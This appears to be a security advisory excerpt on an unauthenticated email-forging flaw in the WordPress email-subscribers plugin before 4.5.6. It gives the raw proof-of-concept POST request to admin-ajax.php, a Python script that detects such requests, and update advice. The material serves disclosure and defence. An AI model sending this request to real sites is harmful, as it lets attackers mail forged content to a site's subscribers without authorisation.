It allows a remote unauthenticated attacker to send forged emails to all recipients from the available lists of contacts or subscribers, with complete control over the content and subject of the email.
```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 222

action=admin_init&broadcast_data[id]=999&ig_es_broadcast_submitted=submitted&broadcast_data[subject]=test999&broadcast_data[body]=body-content&broadcast_data[list_ids]=2&broadcast_data[meta][scheduling_option]=schedule_now
```
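A detection sketch for the request above, added here as an example and not taken from the plugin or the original advisory: it flags POSTs to `admin-ajax.php` that carry the broadcast submission fields without a WordPress login cookie. The function names, the sample requests and the cookie heuristic are assumptions.

```python
from urllib.parse import parse_qsl, urlsplit

AJAX_PATH = "/wp-admin/admin-ajax.php"

def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers, body params)."""
    head, _, body = raw.replace("\r\n", "\n").lstrip().partition("\n\n")
    lines = head.split("\n")
    parts = lines[0].split(" ")
    if len(parts) != 3:
        raise ValueError("malformed request line")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # parse_qsl percent-decodes, so broadcast_data%5Bid%5D is normalised too
    params = parse_qsl(body.strip(), keep_blank_values=True)
    return parts[0].upper(), urlsplit(parts[1]).path, headers, params

def is_forged_broadcast(raw):
    """True if the request matches the unauthenticated broadcast submission."""
    try:
        method, path, headers, params = parse_request(raw)
    except ValueError:
        return False
    if method != "POST" or not path.endswith(AJAX_PATH):
        return False
    submitted = ("ig_es_broadcast_submitted", "submitted") in params
    has_broadcast = any(k.startswith("broadcast_data[") for k, _ in params)
    # Assumption: a missing wordpress_logged_in_* cookie means no session.
    logged_in = "wordpress_logged_in_" in headers.get("cookie", "")
    return submitted and has_broadcast and not logged_in

# Constructed samples: the request shown on this page, and a benign AJAX call.
PAGE_REQUEST = """POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

action=admin_init&broadcast_data[id]=999&ig_es_broadcast_submitted=submitted&broadcast_data[subject]=test999&broadcast_data[body]=body-content&broadcast_data[list_ids]=2&broadcast_data[meta][scheduling_option]=schedule_now"""
BENIGN = """POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Cookie: wordpress_logged_in_0000=constructed

action=heartbeat&_nonce=constructed"""

if __name__ == "__main__":
    for name, req in (("page request", PAGE_REQUEST), ("benign", BENIGN)):
        print(name, "->", "ALERT" if is_forged_broadcast(req) else "ok")
```

A hit from this check is a triage signal only; sites running a version below 4.5.6 should be updated regardless of whether matching requests appear in the logs.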
CPE

Name | Operator | Version |
---|---|---|
email-subscribers | lt | 4.5.6 |